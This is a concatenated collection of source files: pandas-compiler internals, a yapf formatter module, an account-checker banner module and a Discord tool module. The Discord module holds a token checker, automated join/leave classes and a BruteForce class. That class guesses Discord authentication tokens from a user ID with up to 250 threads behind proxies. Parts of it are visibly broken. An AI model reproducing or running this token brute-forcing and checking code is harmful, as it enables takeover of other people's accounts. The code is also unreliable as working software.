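# Hypothetical usage sketch: assert that a test body triggers exactly two
# parfor offloads and no offload failures (the called function is illustrative).
#
#     with assert_auto_offloading(parfor_offloaded=2):
#         run_parallel_kernel()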
``` |
{
"source": "1e-to/sdc",
"score": 2
} |
#### File: sdc/datatypes/hpat_pandas_rolling_types.py
```python
from numba import cgutils, types
from numba.datamodel import StructModel
from numba.extending import make_attribute_wrapper, models
from numba.typing.templates import signature
from sdc.utilities.sdc_typing_utils import TypeChecker
class RollingType(types.Type):
"""Type definition for pandas.rolling functions handling."""
def __init__(self, ty, data, win_type=None, on=None, closed=None):
self.data = data
self.win_type = win_type or types.none
self.on = on or types.none
self.closed = closed or types.none
name_tmpl = '{}({}, win_type={}, on={}, closed={})'
name = name_tmpl.format(ty, data, self.win_type, self.on, self.closed)
super(RollingType, self).__init__(name)
class RollingTypeModel(StructModel):
"""Model for RollingType type."""
def __init__(self, dmm, fe_type):
members = [
('data', fe_type.data),
# window may also be an offset
('window', types.intp),
('min_periods', types.intp),
('center', types.boolean),
('win_type', fe_type.win_type),
('on', fe_type.on),
# axis may also be a unicode string
('axis', types.intp),
('closed', fe_type.closed),
]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(RollingType, 'data', '_data')
make_attribute_wrapper(RollingType, 'window', '_window')
make_attribute_wrapper(RollingType, 'min_periods', '_min_periods')
make_attribute_wrapper(RollingType, 'center', '_center')
make_attribute_wrapper(RollingType, 'win_type', '_win_type')
make_attribute_wrapper(RollingType, 'on', '_on')
make_attribute_wrapper(RollingType, 'axis', '_axis')
make_attribute_wrapper(RollingType, 'closed', '_closed')
def gen_hpat_pandas_rolling_init(ty):
"""Generate rolling initializer based on data type"""
def _hpat_pandas_rolling_init(typingctx, self, window, min_periods=None,
center=False, win_type=None,
on=None, axis=0, closed=None):
"""Internal Numba required function to register RollingType."""
ret_typ = ty(self, win_type, on, closed)
sig = signature(ret_typ, self, window, min_periods,
center, win_type, on, axis, closed)
def _codegen(context, builder, sig, args):
"""Create DataFrameRollingTypeModel structure."""
data, window, min_periods, center, win_type, on, axis, closed = args
rolling = cgutils.create_struct_proxy(sig.return_type)(context, builder)
rolling.data = data
rolling.window = window
rolling.min_periods = min_periods
rolling.center = center
rolling.win_type = win_type
rolling.on = on
rolling.axis = axis
rolling.closed = closed
if context.enable_nrt:
context.nrt.incref(builder, self, rolling.data)
return rolling._getvalue()
return sig, _codegen
return _hpat_pandas_rolling_init
def gen_sdc_pandas_rolling_overload_body(initializer, ty):
"""Generate code of the overloaded method using associated DataType and constructor."""
def sdc_pandas_rolling(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
ty_checker = TypeChecker('Method rolling().')
ty_checker.check(self, ty)
if not isinstance(window, types.Integer):
ty_checker.raise_exc(window, 'int', 'window')
minp_accepted = (types.Omitted, types.NoneType, types.Integer)
if not isinstance(min_periods, minp_accepted) and min_periods is not None:
ty_checker.raise_exc(min_periods, 'None, int', 'min_periods')
center_accepted = (types.Omitted, types.Boolean)
if not isinstance(center, center_accepted) and center is not False:
ty_checker.raise_exc(center, 'bool', 'center')
str_types = (types.Omitted, types.NoneType, types.StringLiteral, types.UnicodeType)
if not isinstance(win_type, str_types) and win_type is not None:
ty_checker.raise_exc(win_type, 'str', 'win_type')
if not isinstance(on, str_types) and on is not None:
ty_checker.raise_exc(on, 'str', 'on')
axis_accepted = (types.Omitted, types.Integer, types.StringLiteral, types.UnicodeType)
if not isinstance(axis, axis_accepted) and axis != 0:
ty_checker.raise_exc(axis, 'int, str', 'axis')
if not isinstance(closed, str_types) and closed is not None:
ty_checker.raise_exc(closed, 'str', 'closed')
nan_minp = isinstance(min_periods, (types.Omitted, types.NoneType)) or min_periods is None
def sdc_pandas_rolling_impl(self, window, min_periods=None, center=False,
win_type=None, on=None, axis=0, closed=None):
if window < 0:
raise ValueError('window must be non-negative')
if nan_minp == True: # noqa
minp = window
else:
minp = min_periods
if minp < 0:
raise ValueError('min_periods must be >= 0')
if minp > window:
raise ValueError('min_periods must be <= window')
if center != False: # noqa
raise ValueError('Method rolling(). The object center\n expected: False')
if win_type is not None:
raise ValueError('Method rolling(). The object win_type\n expected: None')
if on is not None:
raise ValueError('Method rolling(). The object on\n expected: None')
if axis != 0:
raise ValueError('Method rolling(). The object axis\n expected: 0')
if closed is not None:
raise ValueError('Method rolling(). The object closed\n expected: None')
return initializer(self, window, minp, center, win_type, on, axis, closed)
return sdc_pandas_rolling_impl
return sdc_pandas_rolling
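# Hypothetical wiring sketch (the names below are illustrative, not defined in
# this file): the init intrinsic and the overload body generated above could be
# combined roughly as
#
#     _rolling_init = intrinsic(gen_hpat_pandas_rolling_init(SeriesRollingType))
#     rolling_ovld = gen_sdc_pandas_rolling_overload_body(_rolling_init, SeriesType)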
sdc_pandas_rolling_docstring_tmpl = """
Intel Scalable Dataframe Compiler User Guide
********************************************
Pandas API: pandas.{ty}.rolling
Limitations
-----------
Parameters ``center``, ``win_type``, ``on``, ``axis`` and ``closed`` are supported only with default values.
Examples
--------
.. literalinclude:: ../../../examples/{ty_lower}/rolling/{ty_lower}_rolling_min.py
:language: python
:lines: 27-
:caption: Calculate the rolling minimum.
:name: ex_{ty_lower}_rolling
.. command-output:: python ./{ty_lower}/rolling/{ty_lower}_rolling_min.py
:cwd: ../../../examples
.. todo:: Add support of parameters ``center``, ``win_type``, ``on``, ``axis`` and ``closed``
.. seealso::
:ref:`expanding <pandas.{ty}.expanding>`
Provides expanding transformations.
:ref:`ewm <pandas.{ty}.ewm>`
Provides exponential weighted functions.
Intel Scalable Dataframe Compiler Developer Guide
*************************************************
Pandas {ty} attribute :attr:`pandas.{ty}.rolling` implementation
.. only:: developer
Test: python -m sdc.runtests -k sdc.tests.test_rolling.TestRolling.test_{ty_lower}_rolling
Parameters
----------
self: :obj:`pandas.{ty}`
Input {ty}.
window: :obj:`int` or :obj:`offset`
Size of the moving window.
min_periods: :obj:`int`
Minimum number of observations in window required to have a value.
center: :obj:`bool`
Set the labels at the center of the window.
*unsupported*
win_type: :obj:`str`
Provide a window type.
*unsupported*
on: :obj:`str`
Column on which to calculate the rolling window.
*unsupported*
axis: :obj:`int`, :obj:`str`
Axis along which the operation acts
0/None/'index' - row-wise operation
1/'columns' - column-wise operation
*unsupported*
closed: :obj:`str`
Make the interval closed on the ‘right’, ‘left’, ‘both’ or ‘neither’ endpoints.
*unsupported*
Returns
-------
:class:`pandas.{ty}.rolling`
Output class to manipulate with input data.
"""
```
#### File: sdc/datatypes/hpat_pandas_stringmethods_types.py
```python
import pandas
from numba import types, cgutils
from numba.extending import (models, overload, register_model, make_attribute_wrapper, intrinsic)
from numba.datamodel import (register_default, StructModel)
from numba.typing.templates import signature
from sdc.hiframes.split_impl import SplitViewStringMethodsType, StringArraySplitViewType
from sdc.utilities.utils import sdc_overload
class StringMethodsType(types.IterableType):
"""
Type definition for pandas.core.strings.StringMethods functions handling.
Members
----------
_data: :class:`SeriesType`
input arg
"""
def __init__(self, data):
self.data = data
name = 'StringMethodsType({})'.format(self.data)
super(StringMethodsType, self).__init__(name)
@property
def iterator_type(self):
return None
@register_model(StringMethodsType)
class StringMethodsTypeModel(StructModel):
"""
Model for StringMethodsType type
All members must be the same as main type for this model
"""
def __init__(self, dmm, fe_type):
members = [
('data', fe_type.data)
]
models.StructModel.__init__(self, dmm, fe_type, members)
make_attribute_wrapper(StringMethodsType, 'data', '_data')
def _gen_hpat_pandas_stringmethods_init(string_methods_type=None):
string_methods_type = string_methods_type or StringMethodsType
def _hpat_pandas_stringmethods_init(typingctx, data):
"""
Internal function required by Numba to register StringMethodsType and
connect it with the corresponding Python type mentioned in @overload(pandas.core.strings.StringMethods)
"""
def _hpat_pandas_stringmethods_init_codegen(context, builder, signature, args):
"""
Creates the StringMethodsType model structure.
- The codegen callback takes a fixed set of parameters: context, builder, signature, args
- Increases the reference count for the data
"""
[data_val] = args
stringmethod = cgutils.create_struct_proxy(signature.return_type)(context, builder)
stringmethod.data = data_val
if context.enable_nrt:
context.nrt.incref(builder, data, stringmethod.data)
return stringmethod._getvalue()
ret_typ = string_methods_type(data)
sig = signature(ret_typ, data)
"""
Construct signature of the Numba StringMethodsType::ctor()
"""
return sig, _hpat_pandas_stringmethods_init_codegen
return _hpat_pandas_stringmethods_init
_hpat_pandas_stringmethods_init = intrinsic(
_gen_hpat_pandas_stringmethods_init(string_methods_type=StringMethodsType))
_hpat_pandas_split_view_stringmethods_init = intrinsic(
_gen_hpat_pandas_stringmethods_init(string_methods_type=SplitViewStringMethodsType))
@sdc_overload(pandas.core.strings.StringMethods)
def hpat_pandas_stringmethods(obj):
"""
Special Numba procedure to overload Python type pandas.core.strings.StringMethods::ctor()
with Numba registered model
"""
if isinstance(obj.data, StringArraySplitViewType):
def hpat_pandas_split_view_stringmethods_impl(obj):
return _hpat_pandas_split_view_stringmethods_init(obj)
return hpat_pandas_split_view_stringmethods_impl
def hpat_pandas_stringmethods_impl(obj):
return _hpat_pandas_stringmethods_init(obj)
return hpat_pandas_stringmethods_impl
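# Usage sketch: inside a compiled function, constructing the accessor resolves
# through the overload above (the `series` variable is illustrative).
#
#     smethods = pandas.core.strings.StringMethods(series)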
```
#### File: sdc/sdc/sdc_function_templates.py
```python
import numba
import numpy
import operator
import pandas
from numba.errors import TypingError
from numba import types
from sdc.utilities.sdc_typing_utils import (TypeChecker, check_index_is_numeric, check_types_comparable,
find_common_dtype_from_numpy_dtypes)
from sdc.datatypes.common_functions import (sdc_join_series_indexes, sdc_check_indexes_equal)
from sdc.hiframes.pd_series_type import SeriesType
from sdc.str_arr_ext import (string_array_type, str_arr_is_na)
from sdc.utilities.utils import sdc_overload
from sdc.functions.numpy_like import astype
def sdc_pandas_series_operator_binop(self, other):
"""
Pandas Series operator :attr:`pandas.Series.binop` implementation
Note: Currently implemented for numeric Series only.
Differs from Pandas in returning Series with fixed dtype :obj:`float64`
.. only:: developer
**Test**: python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op1*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op2*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_operator_binop*
Parameters
----------
series: :obj:`pandas.Series`
Input series
other: :obj:`pandas.Series` or :obj:`scalar`
Series or scalar value to be used as a second argument of binary operation
Returns
-------
:obj:`pandas.Series`
The result of the operation
"""
_func_name = 'Operator binop().'
ty_checker = TypeChecker('Operator binop().')
self_is_series, other_is_series = isinstance(self, SeriesType), isinstance(other, SeriesType)
if not (self_is_series or other_is_series):
return None
# this overload is not for string series
self_is_string_series = self_is_series and isinstance(self.dtype, types.UnicodeType)
other_is_string_series = other_is_series and isinstance(other.dtype, types.UnicodeType)
if self_is_string_series or other_is_string_series:
return None
if not isinstance(self, (SeriesType, types.Number)):
ty_checker.raise_exc(self, 'pandas.series or scalar', 'self')
if not isinstance(other, (SeriesType, types.Number)):
ty_checker.raise_exc(other, 'pandas.series or scalar', 'other')
operands_are_series = self_is_series and other_is_series
if operands_are_series:
none_or_numeric_indexes = ((isinstance(self.index, types.NoneType) or check_index_is_numeric(self))
and (isinstance(other.index, types.NoneType) or check_index_is_numeric(other)))
series_indexes_comparable = check_types_comparable(self.index, other.index) or none_or_numeric_indexes
if not series_indexes_comparable:
raise TypingError('{} Not implemented for series with not-comparable indexes. \
Given: self.index={}, other.index={}'.format(_func_name, self.index, other.index))
series_data_comparable = check_types_comparable(self, other)
if not series_data_comparable:
raise TypingError('{} Not supported for not-comparable operands. \
Given: self={}, other={}'.format(_func_name, self, other))
# specializations for numeric series only
if not operands_are_series:
def _series_operator_binop_scalar_impl(self, other):
if self_is_series == True: # noqa
result_data = numpy.empty(len(self._data), dtype=numpy.float64)
result_data[:] = self._data + numpy.float64(other)
return pandas.Series(result_data, index=self._index, name=self._name)
else:
result_data = numpy.empty(len(other._data), dtype=numpy.float64)
result_data[:] = numpy.float64(self) + other._data
return pandas.Series(result_data, index=other._index, name=other._name)
return _series_operator_binop_scalar_impl
else: # both operands are numeric series
# optimization for series with default indexes, that can be aligned differently
if (isinstance(self.index, types.NoneType) and isinstance(other.index, types.NoneType)):
def _series_operator_binop_none_indexes_impl(self, other):
if (len(self._data) == len(other._data)):
result_data = astype(self._data, numpy.float64)
result_data = result_data + other._data
return pandas.Series(result_data)
else:
left_size, right_size = len(self._data), len(other._data)
min_data_size = min(left_size, right_size)
max_data_size = max(left_size, right_size)
result_data = numpy.empty(max_data_size, dtype=numpy.float64)
if (left_size == min_data_size):
result_data[:min_data_size] = self._data
result_data[min_data_size:] = numpy.nan
result_data = result_data + other._data
else:
result_data[:min_data_size] = other._data
result_data[min_data_size:] = numpy.nan
result_data = self._data + result_data
return pandas.Series(result_data)
return _series_operator_binop_none_indexes_impl
else:
# for numeric indexes find common dtype to be used when creating joined index
if none_or_numeric_indexes:
ty_left_index_dtype = types.int64 if isinstance(self.index, types.NoneType) else self.index.dtype
ty_right_index_dtype = types.int64 if isinstance(other.index, types.NoneType) else other.index.dtype
numba_index_common_dtype = find_common_dtype_from_numpy_dtypes(
[ty_left_index_dtype, ty_right_index_dtype], [])
def _series_operator_binop_common_impl(self, other):
left_index, right_index = self.index, other.index
# check if indexes are equal and series don't have to be aligned
if sdc_check_indexes_equal(left_index, right_index):
result_data = numpy.empty(len(self._data), dtype=numpy.float64)
result_data[:] = self._data + other._data
if none_or_numeric_indexes == True: # noqa
result_index = astype(left_index, numba_index_common_dtype)
else:
result_index = self._index
return pandas.Series(result_data, index=result_index)
# TODO: replace below with core join(how='outer', return_indexers=True) when implemented
joined_index, left_indexer, right_indexer = sdc_join_series_indexes(left_index, right_index)
result_size = len(joined_index)
left_values = numpy.empty(result_size, dtype=numpy.float64)
right_values = numpy.empty(result_size, dtype=numpy.float64)
for i in numba.prange(result_size):
left_pos, right_pos = left_indexer[i], right_indexer[i]
left_values[i] = self._data[left_pos] if left_pos != -1 else numpy.nan
right_values[i] = other._data[right_pos] if right_pos != -1 else numpy.nan
result_data = left_values + right_values
return pandas.Series(result_data, joined_index)
return _series_operator_binop_common_impl
return None
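# Worked example of the index-alignment path above (values are illustrative):
#   self:  Series([1., 2.], index=[0, 1]);  other: Series([10.], index=[1])
#   joined_index -> [0, 1]; left_indexer -> [0, 1]; right_indexer -> [-1, 0]
#   result_data  -> [1. + nan, 2. + 10.] == [nan, 12.]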
def sdc_pandas_series_operator_comp_binop(self, other):
"""
Pandas Series operator :attr:`pandas.Series.comp_binop` implementation
.. only:: developer
**Test**: python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_op7*
python -m sdc.runtests -k sdc.tests.test_series.TestSeries.test_series_operator_comp_binop*
Parameters
----------
series: :obj:`pandas.Series`
Input series
other: :obj:`pandas.Series` or :obj:`scalar`
Series or scalar value to be used as a second argument of binary operation
Returns
-------
:obj:`pandas.Series`
The result of the operation
"""
_func_name = 'Operator comp_binop().'
ty_checker = TypeChecker('Operator comp_binop().')
self_is_series, other_is_series = isinstance(self, SeriesType), isinstance(other, SeriesType)
if not (self_is_series or other_is_series):
return None
if not isinstance(self, (SeriesType, types.Number, types.UnicodeType)):
ty_checker.raise_exc(self, 'pandas.series or scalar', 'self')
if not isinstance(other, (SeriesType, types.Number, types.UnicodeType)):
ty_checker.raise_exc(other, 'pandas.series or scalar', 'other')
operands_are_series = self_is_series and other_is_series
if operands_are_series:
none_or_numeric_indexes = ((isinstance(self.index, types.NoneType) or check_index_is_numeric(self))
and (isinstance(other.index, types.NoneType) or check_index_is_numeric(other)))
series_indexes_comparable = check_types_comparable(self.index, other.index) or none_or_numeric_indexes
if not series_indexes_comparable:
raise TypingError('{} Not implemented for series with not-comparable indexes. \
Given: self.index={}, other.index={}'.format(_func_name, self.index, other.index))
series_data_comparable = check_types_comparable(self, other)
if not series_data_comparable:
raise TypingError('{} Not supported for not-comparable operands. \
Given: self={}, other={}'.format(_func_name, self, other))
if not operands_are_series:
def _series_operator_comp_binop_scalar_impl(self, other):
if self_is_series == True: # noqa
return pandas.Series(self._data < other, index=self._index, name=self._name)
else:
return pandas.Series(self < other._data, index=other._index, name=other._name)
return _series_operator_comp_binop_scalar_impl
else:
# optimization for series with default indexes, that can be aligned differently
if (isinstance(self.index, types.NoneType) and isinstance(other.index, types.NoneType)):
def _series_operator_comp_binop_none_indexes_impl(self, other):
left_size, right_size = len(self._data), len(other._data)
if (left_size == right_size):
return pandas.Series(self._data < other._data)
else:
raise ValueError("Can only compare identically-labeled Series objects")
return _series_operator_comp_binop_none_indexes_impl
else:
if none_or_numeric_indexes:
ty_left_index_dtype = types.int64 if isinstance(self.index, types.NoneType) else self.index.dtype
ty_right_index_dtype = types.int64 if isinstance(other.index, types.NoneType) else other.index.dtype
numba_index_common_dtype = find_common_dtype_from_numpy_dtypes(
[ty_left_index_dtype, ty_right_index_dtype], [])
def _series_operator_comp_binop_common_impl(self, other):
left_index, right_index = self.index, other.index
if sdc_check_indexes_equal(left_index, right_index):
if none_or_numeric_indexes == True: # noqa
new_index = astype(left_index, numba_index_common_dtype)
else:
new_index = self._index
return pandas.Series(self._data < other._data,
new_index)
else:
raise ValueError("Can only compare identically-labeled Series objects")
return _series_operator_comp_binop_common_impl
return None
def sdc_str_arr_operator_comp_binop(self, other):
self_is_str_arr = self == string_array_type
other_is_str_arr = other == string_array_type
operands_are_arrays = self_is_str_arr and other_is_str_arr
if not (operands_are_arrays
or (self_is_str_arr and isinstance(other, types.UnicodeType))
or (isinstance(self, types.UnicodeType) and other_is_str_arr)):
return None
if operands_are_arrays:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
if len(self) != len(other):
raise ValueError("Mismatch of String Arrays sizes in operator.comp_binop")
n = len(self)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self[i] < other[i]
and not (str_arr_is_na(self, i) or str_arr_is_na(other, i)))
return out_list
elif self_is_str_arr:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
n = len(self)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self[i] < other and not (str_arr_is_na(self, i)))
return out_list
elif other_is_str_arr:
def _sdc_str_arr_operator_comp_binop_impl(self, other):
n = len(other)
out_list = [False] * n
for i in numba.prange(n):
out_list[i] = (self < other[i] and not (str_arr_is_na(other, i)))
return out_list
else:
return None
return _sdc_str_arr_operator_comp_binop_impl
``` |
{
"source": "1ExtremeDev/Account-Checker",
"score": 3
} |
#### File: Account-Checker/core/config.py
```python
import random
from pyfiglet import Figlet
import shutil
config = {
"title": "Regrix",
"author": "ExtremeDev",
"version": "alpha"
}
messages = [
"message1",
"message2",
"message3",
"message4"
]
class Information:
@staticmethod
def print_half(text):
# Center each line of the (possibly multi-line) text in the terminal.
columns = shutil.get_terminal_size().columns
if 'pyfiglet.FigletString' in str(type(text)):
for each in str(text).split('\n'):
print(each.center(columns))
else:
print(text.center(columns))
@staticmethod
def title():
return Figlet(font='standard').renderText(config['title'])
@staticmethod
def author():
return config['author']
@staticmethod
def version():
return str(config['version'])
@staticmethod
def information():
return str(random.choice(messages))
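# Usage sketch: render the centered banner with the helpers above.
if __name__ == '__main__':
Information.print_half(Information.title())
Information.print_half('by ' + Information.author() + ' - ' + Information.version())
Information.print_half(Information.information())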
``` |
{
"source": "1ExtremeDev/ExtremeSx",
"score": 3
} |
#### File: core/discord/actions.py
```python
from core.lib.Proxy.proxy import Proxy
class Join:
"""
This class joins a discord group (link must be only the code)
"""
def __init__(self,
token: str,
link: str,
proxy: list = None
) -> None:
self.proxy = proxy
self.link = link if len(link) == 8 else None
self.token = token
self.join()
def join(self):
import requests
try:
requestResponse = requests.post(
"https://discordapp.com/api/v6/invite/{}".format(self.link),
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'unknown'
elif 'expires_at' in requestResponse.text:
self.r = 'join'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
class Leave:
"""
This class leave a discord group (link must be only the code)
"""
def __init__(self,
token: str,
link: str,
proxy: list = None
) -> None:
self.proxy = proxy
self.link = link if len(link) == 8 else None
self.token = token
self.leave()
def leave(self):
import requests
try:
requestResponse = requests.post(
"https://discordapp.com/api/v7/users/@me/guilds/{}".format(self.link),
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'unknown'
elif requestResponse.status_code == 204:
self.r = 'leave'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
class Checker:
"""
This class checks a discord token
"""
def __init__(self,
token: str,
proxy: list = None
) -> None:
self.proxy = proxy
self.token = token
self.check()
def check(self):
import requests
try:
requestResponse = requests.post(
"https://discordapp.com/api/v6/invite/pXdxXCC",
headers = {
'Authorization': self.token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if 'You need to verify your account in order to perform this action.' in requestResponse.text:
self.r = 'unverified'
elif 'Unauthorized' in requestResponse.text:
self.r = 'invalid'
elif 'Unknown Invite' in requestResponse.text:
self.r = 'valid'
elif 'Access denied' in requestResponse.text:
self.r = 'denied'
else:
self.r = 'other'
except requests.RequestException:
self.r = 'requests.error'
except Exception as e:
self.r = 'error'
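# Usage sketch: the result code is exposed via the `r` attribute
# (the token below is a placeholder, not a real credential).
#
#     status = Checker('<token>').r  # 'valid' | 'invalid' | 'unverified' | 'denied' | 'other'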
class BruteForce:
def __init__(self,
identifier: str,
proxy: list = None
) -> None:
self.id = identifier
self.proxy = proxy
self.start()
def start(self):
import base64, random
import string, requests
import threading
tokens = {"list": [], "valid": None}
def check(token):
try:
requestResponse = requests.get(
"https://discordapp.com/api/v9/auth/login",
headers = {
'Authorization': token
},
proxies = Proxy(self.proxy) if type(self.proxy) is list else None
)
if requestResponse.status_code == 200:
print(" [-] %s " % ( token, ))
token["valid"] = token
else:
print(" [-] %s " % ( token, ))
tokens["list"].append(token)
except:
threading.Thread(target=check, args=(token,)).start()
self.id = base64.b64encode(self.id.encode("ascii")).decode("ascii")
while True:
token = self.id + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=4)) + '.' + ('').join(random.choices(string.ascii_letters + string.digits, k=25))
if threading.active_count() < 250 and tokens["valid"] is None:
threading.Thread(target=check, args=(token,)).start()
```
#### File: core/screen/syst.py
```python
class System:
def Clear():
from platform import platform; from os import system
system('cls') if platform().startswith('Windows') else system('clear')
``` |
{
"source": "1exx/yapf",
"score": 2
} |
#### File: yapf/yapflib/split_penalty.py
```python
import re
from lib2to3 import pytree
from yapf.yapflib import format_token
from yapf.yapflib import py3compat
from yapf.yapflib import pytree_utils
from yapf.yapflib import pytree_visitor
from yapf.yapflib import style
# TODO(morbo): Document the annotations in a centralized place. E.g., the
# README file.
UNBREAKABLE = 1000 * 1000
NAMED_ASSIGN = 15000
DOTTED_NAME = 4000
VERY_STRONGLY_CONNECTED = 3500
STRONGLY_CONNECTED = 3000
CONNECTED = 500
TOGETHER = 100
OR_TEST = 1000
AND_TEST = 1100
NOT_TEST = 1200
COMPARISON = 1300
STAR_EXPR = 1300
EXPR = 1400
XOR_EXPR = 1500
AND_EXPR = 1700
SHIFT_EXPR = 1800
ARITH_EXPR = 1900
TERM = 2000
FACTOR = 2100
POWER = 2200
ATOM = 2300
ONE_ELEMENT_ARGUMENT = 500
SUBSCRIPT = 6000
def ComputeSplitPenalties(tree):
"""Compute split penalties on tokens in the given parse tree.
Arguments:
tree: the top-level pytree node to annotate with penalties.
"""
_SplitPenaltyAssigner().Visit(tree)
class _SplitPenaltyAssigner(pytree_visitor.PyTreeVisitor):
"""Assigns split penalties to tokens, based on parse tree structure.
Split penalties are attached as annotations to tokens.
"""
def Visit(self, node):
if not hasattr(node, 'is_pseudo'): # Ignore pseudo tokens.
super(_SplitPenaltyAssigner, self).Visit(node)
def Visit_import_as_names(self, node): # pyline: disable=invalid-name
# import_as_names ::= import_as_name (',' import_as_name)* [',']
self.DefaultNodeVisit(node)
prev_child = None
for child in node.children:
if (prev_child and isinstance(prev_child, pytree.Leaf) and
prev_child.value == ','):
_SetSplitPenalty(child, style.Get('SPLIT_PENALTY_IMPORT_NAMES'))
prev_child = child
def Visit_classdef(self, node): # pylint: disable=invalid-name
# classdef ::= 'class' NAME ['(' [arglist] ')'] ':' suite
#
# NAME
_SetUnbreakable(node.children[1])
if len(node.children) > 4:
# opening '('
_SetUnbreakable(node.children[2])
# ':'
_SetUnbreakable(node.children[-2])
self.DefaultNodeVisit(node)
def Visit_funcdef(self, node): # pylint: disable=invalid-name
# funcdef ::= 'def' NAME parameters ['->' test] ':' suite
#
# Can't break before the function name and before the colon. The parameters
# are handled by child iteration.
colon_idx = 1
while pytree_utils.NodeName(node.children[colon_idx]) == 'simple_stmt':
colon_idx += 1
_SetUnbreakable(node.children[colon_idx])
arrow_idx = -1
while colon_idx < len(node.children):
if isinstance(node.children[colon_idx], pytree.Leaf):
if node.children[colon_idx].value == ':':
break
if node.children[colon_idx].value == '->':
arrow_idx = colon_idx
colon_idx += 1
_SetUnbreakable(node.children[colon_idx])
self.DefaultNodeVisit(node)
if arrow_idx > 0:
_SetSplitPenalty(
pytree_utils.LastLeafNode(node.children[arrow_idx - 1]), 0)
_SetUnbreakable(node.children[arrow_idx])
_SetStronglyConnected(node.children[arrow_idx + 1])
def Visit_lambdef(self, node): # pylint: disable=invalid-name
# lambdef ::= 'lambda' [varargslist] ':' test
# Loop over the lambda up to and including the colon.
allow_multiline_lambdas = style.Get('ALLOW_MULTILINE_LAMBDAS')
if not allow_multiline_lambdas:
for child in node.children:
if pytree_utils.NodeName(child) == 'COMMENT':
if re.search(r'pylint:.*disable=.*\bg-long-lambda', child.value):
allow_multiline_lambdas = True
break
if allow_multiline_lambdas:
_SetExpressionPenalty(node, STRONGLY_CONNECTED)
else:
_SetExpressionPenalty(node, VERY_STRONGLY_CONNECTED)
def Visit_parameters(self, node): # pylint: disable=invalid-name
# parameters ::= '(' [typedargslist] ')'
self.DefaultNodeVisit(node)
# Can't break before the opening paren of a parameter list.
_SetUnbreakable(node.children[0])
if not (style.Get('INDENT_CLOSING_BRACKETS') or
style.Get('DEDENT_CLOSING_BRACKETS')):
_SetStronglyConnected(node.children[-1])
def Visit_arglist(self, node): # pylint: disable=invalid-name
# arglist ::= argument (',' argument)* [',']
if pytree_utils.NodeName(node.children[0]) == 'STAR':
# Python 3 treats a star expression as a specific expression type.
# Process it in that method.
self.Visit_star_expr(node)
return
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children)):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == ',':
_SetUnbreakable(child)
for child in node.children:
if pytree_utils.NodeName(child) == 'atom':
_IncreasePenalty(child, CONNECTED)
def Visit_argument(self, node): # pylint: disable=invalid-name
# argument ::= test [comp_for] | test '=' test # Really [keyword '='] test
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == '=':
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), NAMED_ASSIGN)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), NAMED_ASSIGN)
def Visit_tname(self, node): # pylint: disable=invalid-name
# tname ::= NAME [':' test]
self.DefaultNodeVisit(node)
for index in py3compat.range(1, len(node.children) - 1):
child = node.children[index]
if isinstance(child, pytree.Leaf) and child.value == ':':
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index]), NAMED_ASSIGN)
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[index + 1]), NAMED_ASSIGN)
def Visit_dotted_name(self, node): # pylint: disable=invalid-name
# dotted_name ::= NAME ('.' NAME)*
for child in node.children:
self.Visit(child)
start = 2 if hasattr(node.children[0], 'is_pseudo') else 1
for i in py3compat.range(start, len(node.children)):
_SetUnbreakable(node.children[i])
def Visit_dictsetmaker(self, node): # pylint: disable=invalid-name
# dictsetmaker ::= ( (test ':' test
# (comp_for | (',' test ':' test)* [','])) |
# (test (comp_for | (',' test)* [','])) )
for child in node.children:
self.Visit(child)
if pytree_utils.NodeName(child) == 'COLON':
# This is a key to a dictionary. We don't want to split the key if at
# all possible.
_SetStronglyConnected(child)
def Visit_trailer(self, node): # pylint: disable=invalid-name
# trailer ::= '(' [arglist] ')' | '[' subscriptlist ']' | '.' NAME
if node.children[0].value == '.':
before = style.Get('SPLIT_BEFORE_DOT')
_SetSplitPenalty(node.children[0],
VERY_STRONGLY_CONNECTED if before else DOTTED_NAME)
_SetSplitPenalty(node.children[1],
DOTTED_NAME if before else VERY_STRONGLY_CONNECTED)
elif len(node.children) == 2:
# Don't split an empty argument list if at all possible.
_SetSplitPenalty(node.children[1], VERY_STRONGLY_CONNECTED)
elif len(node.children) == 3:
name = pytree_utils.NodeName(node.children[1])
if name in {'argument', 'comparison'}:
# Don't split an argument list with one element if at all possible.
_SetStronglyConnected(node.children[1])
if (len(node.children[1].children) > 1 and
pytree_utils.NodeName(node.children[1].children[1]) == 'comp_for'):
# Don't penalize splitting before a comp_for expression.
_SetSplitPenalty(pytree_utils.FirstLeafNode(node.children[1]), 0)
else:
_SetSplitPenalty(
pytree_utils.FirstLeafNode(node.children[1]),
ONE_ELEMENT_ARGUMENT)
elif (pytree_utils.NodeName(node.children[0]) == 'LSQB' and
len(node.children[1].children) > 2 and
(name.endswith('_test') or name.endswith('_expr'))):
_SetStronglyConnected(node.children[1].children[0])
_SetStronglyConnected(node.children[1].children[2])
